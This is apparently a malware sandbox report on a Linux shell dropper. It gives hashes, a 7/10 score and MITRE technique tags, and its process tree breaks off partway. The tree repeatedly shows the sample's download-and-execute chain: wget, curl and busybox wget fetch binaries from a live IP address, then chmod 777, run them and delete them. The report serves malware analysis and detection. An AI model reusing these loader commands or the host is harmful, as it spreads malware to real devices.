158202a011e2f210091d07822732a44a44b49799547ef81a718ea519282c5f5d

Analysis

max time kernel
77s
max time network
79s
platform
debian-9_mipsel
resource
debian9-mipsel-20240729-en
resource tags

arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
26-11-2024 01:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

17a882d74d8f0403825e466d27c6aa7a2d943753c07b52b4cb5eb38452b9f65a.sh
Size

10KB
MD5

25ac41911960743a3801b24c9889d0c1
SHA1

e6d32d6310d18a8bf4ff2fba8fecffae2e12ba4e
SHA256

17a882d74d8f0403825e466d27c6aa7a2d943753c07b52b4cb5eb38452b9f65a
SHA512

98f07a68c31eb173a2cf2e365d1af84975b7be0e880425c50d390b11ce14d3502be471f7bac02bf2ecf731080a07f1352116ed0ec2b55e2d8b318efa272a2967
SSDEEP

192:Y7m95hRUWj5PiUxYkAOFlNtNTWkAOFlK95hRUWi:Y7m95hWWjsUxRtC95hWWi

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
775	chmod
822	chmod
877	chmod
883	chmod
943	chmod
967	chmod
865	chmod
889	chmod
937	chmod
901	chmod
925	chmod
814	chmod
852	chmod
871	chmod
949	chmod
961	chmod
745	chmod
913	chmod
973	chmod
985	chmod
807	chmod
895	chmod
907	chmod
919	chmod
955	chmod
751	chmod
931	chmod
979	chmod

Executes dropped EXE 28 IoCs

Processes:

BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YWevByMY4wmzNymjcp2tK0lMRkVdU65J5ieu8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGvK1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteSde1TCtowW4YXLK3aMQCLCu45FaZiSUUewLYPX20iXdE01EubuCO1vKPKpWurO2dtxnfvNFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4qWbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCObm4U9kz9o489NfSCsldH4iikrwNKhC0D83VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3dcWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4qWbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCOK1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteSde1TCtowW4YXLK3aMQCLCu45FaZiSUUewLYPX20iXdE01EubuCO1vKPKpWurO2dtxnfvbm4U9kz9o489NfSCsldH4iikrwNKhC0D83VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3dcWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg7257KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGvBFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YWevByMY4wmzNymjcp2tK0lMRkVdU65J5ieu8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW	curl
File opened for modification	/tmp/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu	curl
File opened for modification	/tmp/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv	curl
File opened for modification	/tmp/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83	curl
File opened for modification	/tmp/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72	curl
File opened for modification	/tmp/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3	curl
File opened for modification	/tmp/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO	curl
File opened for modification	/tmp/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72	curl
File opened for modification	/tmp/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju	curl
File opened for modification	/tmp/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d	curl
File opened for modification	/tmp/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu	curl
File opened for modification	/tmp/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO	curl
File opened for modification	/tmp/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL	curl
File opened for modification	/tmp/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju	curl
File opened for modification	/tmp/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL	curl
File opened for modification	/tmp/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83	curl
File opened for modification	/tmp/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8	curl
File opened for modification	/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW	curl
File opened for modification	/tmp/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3	curl
File opened for modification	/tmp/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS	curl
File opened for modification	/tmp/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv	curl
File opened for modification	/tmp/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q	curl
File opened for modification	/tmp/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8	curl
File opened for modification	/tmp/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d	curl
File opened for modification	/tmp/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv	curl
File opened for modification	/tmp/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q	curl
File opened for modification	/tmp/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS	curl
File opened for modification	/tmp/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv	curl

/tmp/17a882d74d8f0403825e466d27c6aa7a2d943753c07b52b4cb5eb38452b9f65a.sh
/tmp/17a882d74d8f0403825e466d27c6aa7a2d943753c07b52b4cb5eb38452b9f65a.sh
1⤵
PID:715
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:718
- /usr/bin/wget
  wget http://216.126.231.240/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  PID:721
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:743
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  PID:744
- /bin/chmod
  chmod 777 BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  - File and Directory Permissions Modification
  PID:745
- /tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  ./BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  - Executes dropped EXE
  PID:746
- /bin/rm
  rm BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  PID:747
- /usr/bin/wget
  wget http://216.126.231.240/bins/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  PID:748
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:749
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  PID:750
- /bin/chmod
  chmod 777 evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  - File and Directory Permissions Modification
  PID:751
- /tmp/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  ./evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  - Executes dropped EXE
  PID:752
- /bin/rm
  rm evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  PID:753
- /usr/bin/wget
  wget http://216.126.231.240/bins/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  PID:754
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:761
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  PID:770
- /bin/chmod
  chmod 777 8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  - File and Directory Permissions Modification
  PID:775
- /tmp/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  ./8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  - Executes dropped EXE
  PID:776
- /bin/rm
  rm 8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  PID:779
- /usr/bin/wget
  wget http://216.126.231.240/bins/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  PID:780
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:788
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  PID:801
- /bin/chmod
  chmod 777 57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  - File and Directory Permissions Modification
  PID:807
- /tmp/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  ./57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  - Executes dropped EXE
  PID:808
- /bin/rm
  rm 57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  PID:809
- /usr/bin/wget
  wget http://216.126.231.240/bins/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  PID:810
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:812
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  PID:813
- /bin/chmod
  chmod 777 K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  - File and Directory Permissions Modification
  PID:814
- /tmp/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  ./K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  - Executes dropped EXE
  PID:815
- /bin/rm
  rm K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  PID:816
- /usr/bin/wget
  wget http://216.126.231.240/bins/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  PID:817
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:818
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  PID:819
- /bin/chmod
  chmod 777 n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  - File and Directory Permissions Modification
  PID:822
- /tmp/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  ./n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  - Executes dropped EXE
  PID:824
- /bin/rm
  rm n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  PID:827
- /usr/bin/wget
  wget http://216.126.231.240/bins/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  PID:828
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:837
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  PID:847
- /bin/chmod
  chmod 777 de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  - File and Directory Permissions Modification
  PID:852
- /tmp/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  ./de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  - Executes dropped EXE
  PID:853
- /bin/rm
  rm de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  PID:856
- /usr/bin/wget
  wget http://216.126.231.240/bins/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  PID:858
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:860
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  PID:864
- /bin/chmod
  chmod 777 YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  - File and Directory Permissions Modification
  PID:865
- /tmp/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  ./YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  - Executes dropped EXE
  PID:866
- /bin/rm
  rm YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  PID:867
- /usr/bin/wget
  wget http://216.126.231.240/bins/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  PID:868
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:869
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  PID:870
- /bin/chmod
  chmod 777 NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  - File and Directory Permissions Modification
  PID:871
- /tmp/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  ./NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  - Executes dropped EXE
  PID:872
- /bin/rm
  rm NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  PID:873
- /usr/bin/wget
  wget http://216.126.231.240/bins/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  PID:874
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:875
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  PID:876
- /bin/chmod
  chmod 777 WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  - File and Directory Permissions Modification
  PID:877
- /tmp/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  ./WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  - Executes dropped EXE
  PID:878
- /bin/rm
  rm WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  PID:879
- /usr/bin/wget
  wget http://216.126.231.240/bins/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  PID:880
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:881
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  PID:882
- /bin/chmod
  chmod 777 bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  - File and Directory Permissions Modification
  PID:883
- /tmp/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  ./bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  - Executes dropped EXE
  PID:884
- /bin/rm
  rm bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  PID:885
- /usr/bin/wget
  wget http://216.126.231.240/bins/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  PID:886
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:887
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  PID:888
- /bin/chmod
  chmod 777 VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  - File and Directory Permissions Modification
  PID:889
- /tmp/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  ./VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  - Executes dropped EXE
  PID:890
- /bin/rm
  rm VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  PID:891
- /usr/bin/wget
  wget http://216.126.231.240/bins/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  PID:892
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:893
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  PID:894
- /bin/chmod
  chmod 777 SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  - File and Directory Permissions Modification
  PID:895
- /tmp/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  ./SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  - Executes dropped EXE
  PID:896
- /bin/rm
  rm SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  PID:897
- /usr/bin/wget
  wget http://216.126.231.240/bins/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  PID:898
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:899
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  PID:900
- /bin/chmod
  chmod 777 cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  - File and Directory Permissions Modification
  PID:901
- /tmp/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  ./cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  - Executes dropped EXE
  PID:902
- /bin/rm
  rm cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  PID:903
- /usr/bin/wget
  wget http://216.126.231.240/bins/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  PID:904
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:905
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  PID:906
- /bin/chmod
  chmod 777 NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  - File and Directory Permissions Modification
  PID:907
- /tmp/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  ./NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  - Executes dropped EXE
  PID:908
- /bin/rm
  rm NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
  2⤵
  PID:909
- /usr/bin/wget
  wget http://216.126.231.240/bins/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  PID:910
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:911
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  PID:912
- /bin/chmod
  chmod 777 WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  - File and Directory Permissions Modification
  PID:913
- /tmp/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  ./WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  - Executes dropped EXE
  PID:914
- /bin/rm
  rm WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
  2⤵
  PID:915
- /usr/bin/wget
  wget http://216.126.231.240/bins/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  PID:916
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:917
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  PID:918
- /bin/chmod
  chmod 777 K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  - File and Directory Permissions Modification
  PID:919
- /tmp/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  ./K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  - Executes dropped EXE
  PID:920
- /bin/rm
  rm K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
  2⤵
  PID:921
- /usr/bin/wget
  wget http://216.126.231.240/bins/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  PID:922
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:923
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  PID:924
- /bin/chmod
  chmod 777 n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  - File and Directory Permissions Modification
  PID:925
- /tmp/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  ./n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  - Executes dropped EXE
  PID:926
- /bin/rm
  rm n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
  2⤵
  PID:927
- /usr/bin/wget
  wget http://216.126.231.240/bins/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  PID:928
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:929
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  PID:930
- /bin/chmod
  chmod 777 de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  - File and Directory Permissions Modification
  PID:931
- /tmp/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  ./de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  - Executes dropped EXE
  PID:932
- /bin/rm
  rm de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
  2⤵
  PID:933
- /usr/bin/wget
  wget http://216.126.231.240/bins/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  PID:934
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:935
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  PID:936
- /bin/chmod
  chmod 777 YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  - File and Directory Permissions Modification
  PID:937
- /tmp/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  ./YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  - Executes dropped EXE
  PID:938
- /bin/rm
  rm YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
  2⤵
  PID:939
- /usr/bin/wget
  wget http://216.126.231.240/bins/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  PID:940
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:941
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  PID:942
- /bin/chmod
  chmod 777 bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  - File and Directory Permissions Modification
  PID:943
- /tmp/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  ./bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  - Executes dropped EXE
  PID:944
- /bin/rm
  rm bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
  2⤵
  PID:945
- /usr/bin/wget
  wget http://216.126.231.240/bins/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  PID:946
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:947
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  PID:948
- /bin/chmod
  chmod 777 VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  - File and Directory Permissions Modification
  PID:949
- /tmp/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  ./VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  - Executes dropped EXE
  PID:950
- /bin/rm
  rm VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
  2⤵
  PID:951
- /usr/bin/wget
  wget http://216.126.231.240/bins/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  PID:952
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:953
- /bin/busybox
